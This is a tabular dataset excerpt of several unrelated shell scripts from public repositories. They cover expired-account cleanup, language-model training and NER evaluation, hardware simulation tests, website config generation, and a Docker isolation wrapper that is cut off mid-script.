blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 4 115 | path stringlengths 2 970 | src_encoding stringclasses 28 values | length_bytes int64 31 5.38M | score float64 2.52 5.28 | int_score int64 3 5 | detected_licenses listlengths 0 161 | license_type stringclasses 2 values | text stringlengths 31 5.39M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
b9135c69875a5cca058b86a35b3c763e9be35326 | Shell | adailtonsuporte/vpsmanager2 | /expcleaner2.sh | UTF-8 | 884 | 3.375 | 3 | [] | no_license | #!/bin/bash
# Current time (seconds since epoch); compared against each account's expiry.
datenow=$(date +%s)
# Banner: bold white on blue.
tput setaf 7 ; tput setab 4 ; tput bold ; printf '%45s%-10s%-5s\n' "Removedor de contas expiradas" ""
printf '%-20s%-25s%-20s\n' "Usuário" "Data de expiração" "Estado/Ação" ; echo "" ; tput sgr0
# Walk every account name (first ':'-field) in /etc/passwd.
for user in $(awk -F: '{print $1}' /etc/passwd); do
# Expiry date as reported by chage ("Account expires" line, value after ':').
expdate=$(chage -l $user|awk -F: '/Account expires/{print $2}')
# Accounts that never expire are skipped entirely.
echo $expdate|grep -q never && continue
# Display form of the expiry date: dd/mm/YYYY.
datanormal=$(date -d"$expdate" '+%d/%m/%Y')
tput setaf 3 ; tput bold ; printf '%-20s%-21s%s' $user $datanormal ; tput sgr0
# Expiry converted to epoch seconds; "now - expiry" computed via bc.
expsec=$(date +%s --date="$expdate")
diff=$(echo $datenow - $expsec|bc -l)
tput setaf 2 ; tput bold
# Negative difference => expiry is in the future => still active, keep it.
echo $diff|grep -q ^\- && echo "Ativo (Não removido)" && continue
tput setaf 1 ; tput bold
echo "Expirado (Removido)"
# NOTE(review): pkill -f matches the *full command line*, so any process whose
# command line merely contains the user name is killed too — confirm intended.
pkill -f $user
userdel $user
# Drop the user's record from the local account DB via a temp file.
# NOTE(review): /tmp/ph is a fixed, predictable path shared between runs.
grep -v ^$user[[:space:]] /root/usuarios.db > /tmp/ph ; cat /tmp/ph > /root/usuarios.db
done
tput sgr0
echo ""
| true |
f12676457fb72a8fb0f5f97d2fd3d4c805e8d5a3 | Shell | dadelani/afriberta | /run_all.sh | UTF-8 | 2,237 | 3.15625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# Restrict CUDA to GPUs 0 and 1.
# Fix: the variable the CUDA runtime actually honours is CUDA_VISIBLE_DEVICES;
# the original CUDA_AVAILABLE_DEVICES spelling is ignored by CUDA (a no-op).
export CUDA_VISIBLE_DEVICES=0,1

# --- 1. Train the masked language model ------------------------------------
experiment_name=afriberta_small

python main.py --experiment_name "$experiment_name" --config_path=mlm_configs/afriberta_small.yml

# --- 2. Evaluate on Named Entity Recognition -------------------------------
ner_model_path="${experiment_name}_ner_model"
tokenizer_path=afriberta_tokenizer_70k # specify tokenizer path

# -p: tolerate a pre-existing directory so the script can be re-run.
mkdir -p "$PWD/$ner_model_path"
cp "$PWD/experiments/$experiment_name/pytorch_model.bin" "$PWD/$ner_model_path/pytorch_model.bin"
cp "$PWD/experiments/$experiment_name/config.json" "$PWD/$ner_model_path/config.json"

# NER fine-tuning hyper-parameters.
MAX_LENGTH=164
MODEL_PATH=$ner_model_path
BATCH_SIZE=16
NUM_EPOCHS=50
SAVE_STEPS=1000
TOK_PATH=$tokenizer_path

# The ten evaluation languages (MasakhaNER codes).
declare -a arr=("amh" "hau" "ibo" "kin" "lug" "luo" "pcm" "swa" "wol" "yor")

# Five seeds per language so results can be averaged.
for SEED in 1 2 3 4 5
do
    output_dir=ner_results/"${experiment_name}_ner_results_${SEED}"
    mkdir -p "$PWD/$output_dir"
    for i in "${arr[@]}"
    do
        OUTPUT_DIR="$PWD/$output_dir/$i"
        DATA_DIR=ner_data/"$i"
        python ner_scripts/train_ner.py --data_dir "$DATA_DIR" \
        --model_type nil \
        --model_name_or_path "$MODEL_PATH" \
        --tokenizer_path "$TOK_PATH" \
        --output_dir "$OUTPUT_DIR" \
        --max_seq_length $MAX_LENGTH \
        --num_train_epochs $NUM_EPOCHS \
        --per_gpu_train_batch_size $BATCH_SIZE \
        --per_gpu_eval_batch_size $BATCH_SIZE \
        --save_steps $SAVE_STEPS \
        --seed $SEED \
        --do_train \
        --do_eval \
        --do_predict
    done
done

# --- 3. Evaluate on text classification (Hausa, Yoruba) --------------------
export PYTHONPATH=$PWD

for SEED in 1 2 3 4 5
do
    output_dir=classification_results/"${MODEL_PATH}_hausa_${SEED}"
    python classification_scripts/classification_trainer.py --data_dir hausa_classification_data \
    --model_dir "$MODEL_PATH" \
    --tok_dir "$TOK_PATH" \
    --output_dir "$output_dir" \
    --language hausa \
    --seed $SEED \
    --max_seq_length 500

    output_dir=classification_results/"${MODEL_PATH}_yoruba_${SEED}"
    python classification_scripts/classification_trainer.py --data_dir yoruba_classification_data \
    --model_dir "$MODEL_PATH" \
    --tok_dir "$TOK_PATH" \
    --output_dir "$output_dir" \
    --language yoruba \
    --seed $SEED \
    --max_seq_length 500
done
| true |
763b9d5289e25650cc6432a86d5ead0aa30153e0 | Shell | ismo-karkkainen/datalackey | /test/memory/abs-change-directory.sh | UTF-8 | 787 | 3.46875 | 3 | [
"LicenseRef-scancode-unknown-license-reference",
"UPL-1.0"
] | permissive | #!/bin/sh
# Exactly one argument is required: the datalackey executable under test.
if [ $# -ne 1 ]; then
    echo "Usage: $(basename $0) datalackey-executable"
    exit 100
fi
# Derive output/expected file names from this script's base name.
B=$(basename $0 .sh)
DL=$1
OUT="${B}_out.txt"
EXP="${B}_expected.txt"
# Helper child script: simply creates a file named "cwd" in its working dir,
# which lets us detect which directory datalackey ran it from.
cat > _script.sh << EOF
#!/bin/sh
touch cwd
EOF
chmod a+x _script.sh
# Fresh absolute subdirectory that datalackey is asked to change into.
SUBDIR=$(pwd)/subdir
rm -rf "$SUBDIR"
mkdir "$SUBDIR"
# Feed datalackey a JSON "run" command with change-directory set to $SUBDIR;
# replace-pid normalises process ids in the output so it is comparable.
(
echo '["1","run","out","JSON","stdout","change-directory",'
echo "\"$SUBDIR\""
echo ',"program","./_script.sh"]'
) | $DL -m -i stdin JSON -o stdout JSON |
replace-pid > $OUT
# Expected normalised output for a successful run (do not edit the heredoc).
cat > $EXP <<EOF
["1","run","running","pid"]
[null,"process","started","1","pid"]
set
["1","run","input","closed"]
["1","run","exit",0]
end
[null,"process","ended","1","pid"]
["1","run","finished"]
["1","done",""]
EOF
# Pass iff the child really ran inside $SUBDIR (cwd file exists) and the
# output matches; clean up only on success so failures can be inspected.
test -f "$SUBDIR/cwd" &&
compare-output $OUT $EXP && rm -rf $OUT $EXP _script.sh "$SUBDIR"
| true |
62075ac496cabf1a7a5c347d51efae60b17b13d6 | Shell | google/skia-buildbot | /bugs-central/bin/create-github-token-secret.sh | UTF-8 | 402 | 3.3125 | 3 | [
"BSD-3-Clause"
] | permissive | #/bin/bash
# Creates the bugs-central-github-token secret.
# NOTE: set -x echoes commands (including the token argument) to the terminal.
set -e -x

# Require exactly one argument: the GitHub token value.
if [ "$#" -ne 1 ]; then
        echo "The argument must be the github token."
        echo ""
        echo "./create-github-token-secret.sh xyz"
        exit 1
fi
SECRET_VALUE=$1
SECRET_NAME="bugs-central-github-token"

# Stage the token for upload. Fix: use '>' (truncate) instead of the original
# '>>' (append) — appending on a re-run left stale token lines in the secret.
# printf avoids echo's option/escape pitfalls with arbitrary token values.
printf '%s\n' "${SECRET_VALUE}" > github_token

../../kube/secrets/add-secret-from-directory.sh \
    github_token \
    skia-public \
    "${SECRET_NAME}"

# Do not leave the plaintext token lying around on disk after upload.
rm -f github_token
| true |
da54700f948c33b8246de82ecdd905689fc417d8 | Shell | yukisako/GeneticAlgorithm | /simu.sh | UTF-8 | 155 | 2.671875 | 3 | [] | no_license | #!/bin/sh
# Generation number passed to the first simulation run.
currentGeneration=915

# Run 3001 consecutive generations (915 .. 3915 inclusive).
# A C-style arithmetic loop replaces the legacy `seq`/`expr` pair so no
# external process is forked per iteration just to count.
for ((i = 0; i <= 3000; i++))
do
  # -notex: presumably disables textured/graphical output — confirm with a.out.
  ./a.out "${currentGeneration}" -notex
  currentGeneration=$((currentGeneration + 1))
done
| true |
587622d3f36671b9da974ab214b46ae4e94fbc8b | Shell | leonardt/magma_coreir_chisel_firrtl | /lfsr-chisel/run.sh | UTF-8 | 634 | 3.125 | 3 | [] | no_license | #!/bin/bash
# Abort on the first failing step of the pipeline.
set -e
# Design under test; expects $TEST.fir (FIRRTL) and $TEST.vec (test vectors).
TEST="lfsr"
GREEN='\033[0;32m'
NC='\033[0m' # No Color
mkdir -p build
# Step 1: simulate the FIRRTL directly with the firrtl-interpreter.
echo -e "Running firrtl-interpreter test on $TEST.fir with $TEST.vec"
cd ../firrtl-interpreter
./run-test-vec.sh -f ../lfsr-chisel/$TEST.fir -tv ../lfsr-chisel/$TEST.vec -so
cd ../$TEST-chisel
echo -e "${GREEN}PASSED (firrtl + firrtl-interpreter)${NC}"
# Step 2: compile the FIRRTL to a CoreIR .json.
echo -e "Running firrtl to generate coreir .json from $TEST.fir"
../firrtl/utils/bin/firrtl -i $TEST.fir -o build/$TEST.json -X coreir
# Step 3: run the same vectors against the CoreIR output under verilator.
echo -e "Running verilator test"
../coreir-test -i build/$TEST.json -t $TEST.vec
echo -e "${GREEN}PASSED (firrtl->coreir->verilog + verilator)${NC}"
| true |
cf25dc43fc7c114577b69d94ec943042ba2b4e33 | Shell | juliendelile/PhD_manuscript | /docs/js/config_generate | UTF-8 | 3,414 | 3.765625 | 4 | [] | no_license | #!/bin/bash
#Part 1: generate the config.js file that contains associative arrays linking page IDs to their path, depth and title
# Start config.js fresh; everything below appends to it.
echo "//generated by config_generate. Do no modify..." > config.js
echo "var filepath = new Array();" >> config.js
echo "var relativepathcorrection = new Array();" >> config.js
echo "var pagetitle = new Array();" >> config.js
echo "var idpage = new Array();" >> config.js
# Running count of pages written; slot 0 is reserved for the main index.
numpage=1;
#main index.html is manually filled. idpage -> 0
echo "filepath[0] = \"index.html\";" >> config.js
echo "relativepathcorrection[0] = \"\";" >> config.js
echo "pagetitle[0] = \"\";" >> config.js
echo "idpage[0] = 0;" >> config.js
# fillConfig <path/to/index.html> <depth>
# Parses the IDpage and titlepage JS variables out of the given page file,
# appends the page's filepath / relative-path / title / id entries to
# config.js, and caches them in the b* arrays for Part 2 (menu generation).
fillConfig(){
	#extract IDpage
	#extract the line that contains Idpage
	idpage=`awk '/var IDpage = /,/;/' $1`
	#echo "$idpage"
	#remove part of the line before IDpage
	idpage=${idpage#*IDpage = }
	#echo "$idpage"
	#remove part of the line after IDpage
	idpage=${idpage%;*}
	#echo "$idpage"
	#extract page title
	#extract the line that contains the title
	title=`awk '/var titlepage = /,/;/' $1`
	#echo "$title"
	#remove part of the line before titlepage
	title=${title#*titlepage = \"}
	#echo "$title"
	#remove part of the line after titlepage
	title=${title%\";*}
	echo "$idpage $title"
	#extract file path like page/folder1/folder2
	#remove ../
	filepath=${1#*/}
	#remove /index.html
	filepath=${filepath%index*}
	#build relative path from depth
	# One "../" per nesting level, plus the initial one.
	relative="../"
	for (( i=0; i<$2; i++ )){
		relative=$relative"../"
	}
	echo "filepath[$idpage] = \"$filepath\";" >> config.js
	echo "relativepathcorrection[$idpage] = \"$relative\";" >> config.js
	echo "pagetitle[$idpage] = \"$title\";" >> config.js
	#echo "file $1 idpage:$idpage title:$title filepath:$filepath relative:$relative"
	# Cache per-id values for Part 2 (menu generation) below.
	bfilepath[$idpage]=$filepath
	brelativepathcorrection[$idpage]=$relative
	bpagetitle[$idpage]=$title
	echo "idpage[$numpage] = $idpage;" >> config.js
	let "numpage += 1"
}
# recurse <dir> <parent-depth>
# Depth-first walk: directories recurse with depth+1, files are handed to
# fillConfig with the current depth.
recurse() {
	local level=0
	let "level = $2 + 1"
	#echo "folder $1 depth $level"
	for i in "$1"/*;do
		if [ -d "$i" ];then
			recurse "$i" $level
		elif [ -f "$i" ]; then #we could check here if the file name is index.html (later if needed)
			fillConfig "$i" $level
		fi
	done
}
#Get each page information and write config.js
#walk all folder in /page/
for i in "../page"/*;do
	if [ -d "$i" ];then
		recurse "$i" 0
	fi
done
echo "var numpage = $numpage;" >> config.js
#Part 2: write the menu in each index.html
#the href are simply given by the id and another function will convert them later...
# Seed the menu with the two hand-written entries.
menuHTML="<li><a href='home'>Home</a></li><li><a href='manuscript'>Manuscript</a></li>"
# recurseMenu <dir>
# Builds nested <li>/<ul> menu HTML into the global menuHTML string, using
# each directory's index.html IDpage and the titles cached by fillConfig.
recurseMenu() {
	#extract IDpage
	idpage=`awk '/var IDpage = /,/;/' $1/index.html`
	idpage=${idpage#*IDpage = }
	idpage=${idpage%;*}
	menuHTML="$menuHTML<li><a href='$idpage'>${bpagetitle[$idpage]}</a>"
	# find counts the directory itself, hence the "-gt 1" tests below.
	local subdircount=`find $1 -maxdepth 1 -type d | wc -l`
	#if the directory contains subdirectory/ies, prepare ul list
	if [ $subdircount -gt 1 ];then
		menuHTML="$menuHTML<ul>"
	fi
	for i in "$1"/*;do
		if [ -d "$i" ];then
			recurseMenu "$i"
		fi
	done
	if [ $subdircount -gt 1 ];then
		menuHTML="$menuHTML</ul>"
	fi
	menuHTML="$menuHTML</li>"
}
#walk all folder in /page/
for i in "../page"/*;do
	if [ -d "$i" ];then
		recurseMenu "$i"
	fi
done
# Publish the assembled menu markup into config.js.
echo "var menuHTML = \"$menuHTML\";" >> config.js
| true |
ce7e5f4e1ea5cf88d2b27663bf7a8f8f7f9147b5 | Shell | tomgillooly/geogan | /test_circle.sh | UTF-8 | 1,007 | 2.53125 | 3 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | #!/bin/bash
# Pick virtualenv, dataset location and options per machine.
if [ "$HOSTNAME" == "tomoplata-OptiPlex-790" ]; then
	VIRTUALENV_NAME=pytorch3
	DATAROOT=~/data/circle_data_non_filled
	HOME=~
	OPTIONS="--gpu_ids -1 --display_id 0"
else
	VIRTUALENV_NAME=cyclegan3
	DATAROOT=/storage/Datasets/Geology-NicolasColtice/ellipses
	HOME=/home/tgillooly/
	OPTIONS="--gpu_ids -1"
fi
# marky needs the CUDA-8 build of the environment.
if [ "$HOSTNAME" == "marky" ]; then
	VIRTUALENV_NAME=pytorch3_cuda8
fi
source $HOME/$VIRTUALENV_NAME/bin/activate
# python -m visdom.server > visdom.log 2>&1 &
# python test.py --dataroot /storage/Datasets/Geology-NicolasColtice/DS2-1810-RAW-DAT --name geo_pix2pix_skel_remove --model pix2pix --which_model_netG unet_256 --which_direction BtoA --dataset_mode geo --norm batch --process skeleton_remove_small_components
# $1 = experiment name, $2 = checkpoint epoch to evaluate.
python test.py --dataroot $DATAROOT --name $1 --model div_inline --which_model_netG unet_256 \
	--which_epoch $2 --how_many 10 --serial_batches \
	--which_direction BtoA --dataset_mode geo --norm batch --input_nc 3 --output_nc 1 $OPTIONS
# kill %1
deactivate
| true |
44c125834ac8e517acda4558a69ceef5cc113397 | Shell | hugojosefson/isolate-in-docker | /isolate-in-docker | UTF-8 | 12,436 | 4.40625 | 4 | [] | no_license | #!/usr/bin/env bash
## This file is not meant to be executed directly.
## It should be executed via a symlink, named the same as the executable you wish to execute inside the Docker image.
## Documentation at https://github.com/hugojosefson/isolate-in-docker#readme
# Fail on any error
set -e
# Save args
# (kept globally: override() and the final docker run both forward them)
args=("$@")
# Numeric booleans, for legibility
true=0
false=1
# Default, if none specified in ./.nvmrc nor in $NODE_VERSION
DEFAULT_NODE_VERSION=latest
# Print docker arguments for allowing the container to access the host's docker engine, in case $DOCKERCEPTION is set.
maybeDockerception() {
  # Opt-in only: print nothing unless $DOCKERCEPTION is set.
  [[ -z "${DOCKERCEPTION}" ]] && return
  local docker_sock
  local docker_sock_gid
  local docker_bin
  # Host docker socket path, taken from the active docker context.
  docker_sock="$(docker context inspect -f '{{.Endpoints.docker.Host}}' | sed -E 's/^unix:\/\///')"
  # Group owning the socket; the container joins it to gain access.
  docker_sock_gid="$(stat -c '%g' "${docker_sock}")"
  docker_bin="$(command -v docker)"
  echo "--group-add \"${docker_sock_gid}\" \
    -v \"${docker_sock}\":\"${docker_sock}\" \
    -v \"${docker_bin}\":\"${docker_bin}\":ro \
    "
}
# True (0) when the path is a readable regular file, or a symlink whose fully
# resolved target is one; false (1) otherwise.
fileExists() {
  local candidate="${1}"
  # Unreadable (or nonexistent) paths never qualify.
  if [[ ! -r "${candidate}" ]]; then
    return ${false}
  fi
  # A readable regular file qualifies directly.
  if [[ -f "${candidate}" ]]; then
    return ${true}
  fi
  # A symlink may still lead to a regular file: resolve fully and re-check.
  if [[ -L "${candidate}" ]]; then
    fileExists "$(readlink -f "${candidate}")"
    return
  fi
  # Readable but neither a regular file nor a symlink (e.g. a directory).
  return ${false}
}
# Source the given file into the current shell if it is a readable file,
# announcing it on stderr; silently does nothing otherwise.
sourceFileIfExists() {
  if fileExists "${1}"; then
    echo Sourcing "${1}" >&2
    . "${1}"
  fi
}
# Name of the symlink this script was invoked through; selects the tool.
getLinkName() {
  basename "${0}"
}
# Absolute working directory to mount: $DOCKER_WORKDIR if set (resolved to an
# absolute path via a subshell cd), otherwise the current directory.
getDockerWorkdir() {
  local possiblyRelativeWorkdir="${DOCKER_WORKDIR:-$(pwd)}"
  (cd "${possiblyRelativeWorkdir}" && pwd)
}
# Print one random alphanumeric string of length $1 (default 32).
rand() {
  # shellcheck disable=SC2002
  cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w "${1:-32}" | head -n 1
}
# Normalise stdin into a string safe for docker container/host names:
# maps "/" to "root" (and "/-…" to "root-…"), strips leading
# non-alphanumerics, and replaces any remaining unsafe character with "_".
safeName() {
  # One sed process, expressions applied in order (same order as before).
  sed -E \
    -e 's/\n//g' \
    -e 's/^\/$/root/' \
    -e 's/^\/-/root-/' \
    -e 's/^[^a-zA-Z0-9]+//' \
    -e 's/[^a-zA-Z0-9_.-]/_/g'
}
# Find the next occurance of an executable with the name $(getLinkName) in the PATH, that does not point to the current script, and execute it.
# If the caller supplies one argument, that will be the program to execute instead of looking for the next executable in the PATH.
override() {
  # Explicit replacement given: exec it directly with the saved args.
  if [[ -n "${1}" ]]; then
    exec "${1}" "${args[@]}"
  fi
  local paths
  local current_script
  local possible_override
  # split PATH into paths using read
  IFS=: read -ra paths <<< "${PATH}"
  current_script="$(readlink -f "${0}")"
  for path in "${paths[@]}"; do
    possible_override="${path}/$(getLinkName)"
    # Skip any PATH entry that resolves back to this very script.
    if [[ "$(readlink -f "${possible_override}")" != "${current_script}" ]]; then
      if [[ -x "${possible_override}" ]]; then
        echo Overriding implementation with "${possible_override}" >&2
        exec "${possible_override}" "${args[@]}"
      fi
    fi
  done
  echo No override found on PATH for "$(getLinkName)" >&2
  return 1
}
# Emit the README text dropped into each project's .isolate-in-docker/config
# directory; interpolates the current tool name and working directory.
# (The body is a single runtime string — do not edit casually.)
getConfigDirReadme() {
  echo "-------------------------------------------------------------------------------
Config dir for isolate-in-docker tools
when in: $(pwd)
-------------------------------------------------------------------------------
NOTE! This config directory is specific for $(pwd)
and used only when your current working directory is that directory!
You may create a file here for each tool you use (named as the symlink, with the
extension .rc, for example \"$(getLinkName).rc\"). If you do, it will be sourced
before running that tool.
You may declare environment variables in the configuration file. For details, see:
https://github.com/hugojosefson/isolate-in-docker#configuration-options
Additionally, if you create a file named \"default.rc\", it will be sourced
before all isolate-in-docker tools, before the specific tool's config file.
-------------------------------------------------------------------------------
If, for this project, you want to override and use the next implementation of
a command on the PATH, instead of via isolate-in-docker, you can create the
relevant .rc file in the config directory, and put this line in it:
override
For example, if you want to override $(getLinkName) with the next available
implementation on the PATH, you can create the file like this:
mkdir -p .isolate-in-docker/config
echo override > .isolate-in-docker/config/$(getLinkName).rc
If you do it without any arguments, it will override the command with the next
implementation on the PATH. If you want to override it with a different
implementation, you can specify the path to the new implementation as an
argument. For example:
override /snap/bin/$(getLinkName)
"
}
# Ensure the per-project config dir exists (with README), then source the
# shared default.rc followed by the tool-specific <tool>.rc, if present.
readConfigFiles() {
  local configDir=".isolate-in-docker/config"
  mkdir -p "${configDir}"
  getConfigDirReadme > "${configDir}/README"
  sourceFileIfExists "${configDir}/default.rc"
  sourceFileIfExists "${configDir}/$(getLinkName).rc"
}
# uid:gid to run the container as; $DOCKER_USER overrides the caller's ids.
getDockerUser() {
  echo "${DOCKER_USER:-"$(id -u)":"$(id -g)"}"
}
# Node version to use, in priority order:
# $NODE_VERSION, then ./.nvmrc, then $DEFAULT_NODE_VERSION.
getNodeVersion() {
  if [[ -n "${NODE_VERSION}" ]]; then
    echo "${NODE_VERSION}"
    return
  fi
  local nvmrc_version="$(cat .nvmrc 2>/dev/null)"
  if [[ -n "${nvmrc_version}" ]]; then
    echo "${nvmrc_version}"
    return
  fi
  echo "${DEFAULT_NODE_VERSION}"
}
# Command to execute inside the container: $DOCKER_CMD overrides everything;
# a few tools need special invocations; all others just run the link name.
getDockerCmd() {
  if [[ -n "${DOCKER_CMD}" ]]; then
    echo "${DOCKER_CMD}"
    return
  fi
  local link
  link="$(getLinkName)"
  case "${link}" in
    firefox40)      echo "/opt/firefox/firefox-bin --new-instance" ;;
    signal-desktop) echo "signal-desktop --no-sandbox" ;;
    *)              echo "${link}" ;;
  esac
}
# Print the docker image to use — plus any image-specific extra `docker run`
# arguments — based on the symlink name. $DOCKER_IMAGE overrides everything.
# Each branch's echo is a runtime string consumed verbatim by docker run.
getDockerImage() {
  if [[ -n "${DOCKER_IMAGE}" ]]; then
    echo "${DOCKER_IMAGE}"
  elif [[ "$(getLinkName)" =~ ^(node|npm|npx|yarn)$ ]]; then
    # Node toolchain: version resolved via getNodeVersion().
    echo "--env NODE_ENV=${NODE_ENV} node:$(getNodeVersion)"
  elif [[ "$(getLinkName)" =~ ^(firefox40)$ ]]; then
    echo "\
      --device /dev/dri:/dev/dri \
      docker.io/netcapsule/firefox \
      "
  elif [[ "$(getLinkName)" =~ ^(webstorm|webstorm-install-rust|clion)$ ]]; then
    # GUI IDEs: image creates a matching user internally, hence root + ids.
    echo "\
      --device /dev/dri:/dev/dri \
      --user root:root \
      --env USER_ID=${USER_ID:-$(id -u)} \
      --env USER_NAME=${USER_NAME:-$(id -un)} \
      --env GROUP_ID=${GROUP_ID:-$(id -g)} \
      --env GROUP_NAME=${GROUP_NAME:-$(id -gn)} \
      docker.io/hugojosefson/webstorm \
      "
  elif [[ "$(getLinkName)" =~ ^(goland|jetbrains-toolbox)$ ]]; then
    echo "\
      --device /dev/dri:/dev/dri \
      --user root:root \
      --env USER_ID=${USER_ID:-$(id -u)} \
      --env USER_NAME=${USER_NAME:-$(id -un)} \
      --env GROUP_ID=${GROUP_ID:-$(id -g)} \
      --env GROUP_NAME=${GROUP_NAME:-$(id -gn)} \
      docker.io/hugojosefson/goland \
      "
  elif [[ "$(getLinkName)" =~ ^(pulseUi)$ ]]; then
    # VPN client: needs extra capabilities and the tun device.
    echo "\
      --cap-add NET_ADMIN \
      --cap-add SYS_ADMIN \
      --cap-add MKNOD \
      --device /dev/net/tun:/dev/net/tun \
      --device /dev/dri:/dev/dri \
      --user root:root \
      --env USER_ID=${USER_ID:-$(id -u)} \
      --env USER_NAME=${USER_NAME:-$(id -un)} \
      --env GROUP_ID=${GROUP_ID:-$(id -g)} \
      --env GROUP_NAME=${GROUP_NAME:-$(id -gn)} \
      docker.io/hugojosefson/pulsevpn \
      "
  elif [[ "$(getLinkName)" =~ ^(git-revise)$ ]]; then
    echo "-v \"${HOME}/.gitconfig\":\"${HOME}/.gitconfig\":ro docker.io/hugojosefson/git-revise"
  elif [[ "$(getLinkName)" =~ ^(signal-desktop)$ ]]; then
    echo "\
      --device /dev/dri:/dev/dri \
      --user root:root \
      --env USER_ID=${USER_ID:-$(id -u)} \
      --env USER_NAME=${USER_NAME:-$(id -un)} \
      --env GROUP_ID=${GROUP_ID:-$(id -g)} \
      --env GROUP_NAME=${GROUP_NAME:-$(id -gn)} \
      docker.io/hugojosefson/signal-desktop \
      "
  elif [[ "$(getLinkName)" =~ ^(aws)$ ]]; then
    echo "docker.io/mikesir87/aws-cli"
  elif [[ "$(getLinkName)" =~ ^(heroku)$ ]]; then
    echo "docker.io/dickeyxxx/heroku-cli"
  elif [[ "$(getLinkName)" =~ ^(mvn|jaotc|jar|jarsigner|java|javac|javadoc|javap|jcmd|jconsole|jdb|jdeprscan|jdeps|jhsdb|jimage|jinfo|jjs|jlink|jmap|jmod|jps|jrunscript|jshell|jstack|jstat|jstatd|keytool|pack200|rmic|rmid|rmiregistry|serialver|unpack200)$ ]]; then
    # JVM toolchain; urandom mapped in for faster SecureRandom seeding.
    echo "\
      --device /dev/urandom:/dev/urandom \
      docker.io/maven \
      "
  elif [[ "$(getLinkName)" =~ ^(cargo|cargo-clippy|cargo-fmt|cargo-miri|clippy-driver|rls|rust-gdb|rust-lldb|rustc|rustdoc|rustfmt|rustup)$ ]]; then
    echo "docker.io/rust"
  else
    echo "Unknown symlink name: \'$(getLinkName)\'" >&2
    exit 1
  fi
}
# Are we in a TTY?
# (checks stdin; used to decide whether to pass --tty to docker run)
isTTY() {
  if [[ -t 0 ]]; then
    return ${true}
  else
    return ${false}
  fi
}
# Are they running husky?
# (detected by the husky runner script appearing anywhere in the args)
isHusky() {
  if [[ "$*" =~ node_modules/husky/run.js ]]; then
    return ${true}
  else
    return ${false}
  fi
}
# Do we have git installed?
haveGit() {
  command -v git >/dev/null
}
# Is the current directory a git repo?
isGitRepo() {
  [[ -d ".git" ]]
}
# Write current git user config to .isolate-in-docker/home/.gitconfig, so it is visible inside the Docker container.
writeGitUserToConfig() {
  local gitEmail
  local gitName
  local gitConfigFile
  gitEmail="$(git config user.email)"
  gitName="$(git config user.name)"
  gitConfigFile=".isolate-in-docker/home/.gitconfig"
  mkdir -p "$(dirname "${gitConfigFile}")"
  touch "${gitConfigFile}"
  # Clear any stale values first; '|| true' because unset-all fails when the
  # key is absent, and we are running under set -e.
  git config --file "${gitConfigFile}" --unset-all user.email || true
  git config --file "${gitConfigFile}" --unset-all user.name || true
  git config --file "${gitConfigFile}" --add user.email "${gitEmail}"
  git config --file "${gitConfigFile}" --add user.name "${gitName}"
}
# ensureInFile <file> <line>
# Append <line> (preceded by a blank line) unless the file already contains
# it as an exact full-line match.
ensureInFile() {
  local target_file="${1}"
  local wanted_line="${2}"
  # Already present -> nothing to do.
  grep -x "${wanted_line}" "${target_file}" >/dev/null && return 0
  printf '\n%s\n' "${wanted_line}" >> "${target_file}"
}
# True if the path exists at all (any type, including broken-symlink targets
# visible to ls -d).
exists() {
  local target="${1}"
  ls -d "${target}" >/dev/null 2>&1
}
# Migrates any symlinked directories from previous versions of isolate-in-docker
migrateIfSymlink() {
  local name="${1}"
  if [[ -L "${name}" ]]; then
    local targetDir="$(readlink -f "${name}")"
    if [[ -d "${targetDir}" ]]; then
      # Old layout symlinked to a real dir elsewhere: move the dir in place.
      rm -f "${name}"
      mv "${targetDir}" "${name}"
    else
      # Symlink to something else: park it aside as <name>.old.
      mv "${name}" "${name}.old"
    fi
  elif exists "${name}" && ! [[ -d "${name}" ]]; then
    # Exists but is not a directory: park it aside too.
    mv "${name}" "${name}.old"
  fi
}
# Creates a directory .isolate-in-docker, with home and config.
createIsolation() {
  # Keep the isolation dir out of git status without touching .gitignore.
  if isGitRepo; then
    ensureInFile .git/info/exclude .isolate-in-docker/
  fi
  # Migrate layouts from older isolate-in-docker versions, then (re)create.
  migrateIfSymlink .isolate-in-docker/home
  migrateIfSymlink .isolate-in-docker/config
  mkdir -p .isolate-in-docker/empty
  mkdir -p .isolate-in-docker/home
  mkdir -p .isolate-in-docker/config
  # Propagate git identity so commits made inside the container are attributed.
  if isGitRepo && haveGit; then
    writeGitUserToConfig
  fi
}
# Check how we were called
# (running the real script directly, not via a tool-named symlink, is an error)
if [[ "$(basename "${0}")" == "$(basename "$(readlink -f "${0}")")" ]]; then
  echo "This script is meant to be executed via a symlink. \
Please see https://github.com/hugojosefson/isolate-in-docker#readme for installation instructions." >&2
  exit 1
fi
# Program starts here
createIsolation
# Configurable env variables
# (the sourced .rc files may set/override any of the DOCKER_* values below)
readConfigFiles
DOCKER_IMAGE="$(getDockerImage)"
DOCKER_USER="$(getDockerUser)"
DOCKER_WORKDIR="$(getDockerWorkdir)"
DOCKER_CMD="$(getDockerCmd)"
DOCKER_EXTRA_ARGS="${DOCKER_EXTRA_ARGS:-}"
# Hostname: stable per workdir; container name: unique per run (timestamp+rand).
DOCKER_HOSTNAME="${DOCKER_HOSTNAME:-${DOCKER_NAME:-$(basename "${DOCKER_WORKDIR}" | safeName)}}"
DOCKER_NAME="${DOCKER_NAME:-$(echo "$(basename "${DOCKER_WORKDIR}")"-"$(date --utc --iso-8601=seconds | sed -E 's/://g' | sed -E 's/\+0000/Z/g')"-"$(rand 4)" | safeName)}"
DOCKER_NET="${DOCKER_NET:-host}"
# Allocate a TTY only for interactive use; husky git hooks must not get one.
if isTTY && ! isHusky "$@"; then
  TTY_ARG="--tty"
else
  TTY_ARG=""
fi
if [[ -n "${PORT}" ]]; then
  PORT_ARGS="--env PORT=\"${PORT}\""
else
  PORT_ARGS=""
fi
# Mount the working directory at the same absolute path inside the container;
# a workdir of "/" is special-cased under /host-root.
if [[ "${DOCKER_WORKDIR}" == "/" ]]; then
  DOCKER_WORKDIR_ARGS="--workdir /host-root --volume /:/host-root"
else
  mkdir -p ".isolate-in-docker/home${DOCKER_WORKDIR#"${HOME}"}"
  DOCKER_WORKDIR_ARGS="--workdir ${DOCKER_WORKDIR} --volume ${DOCKER_WORKDIR}:${DOCKER_WORKDIR}"
fi
# Replace this process with the container run. The empty:ro mount hides the
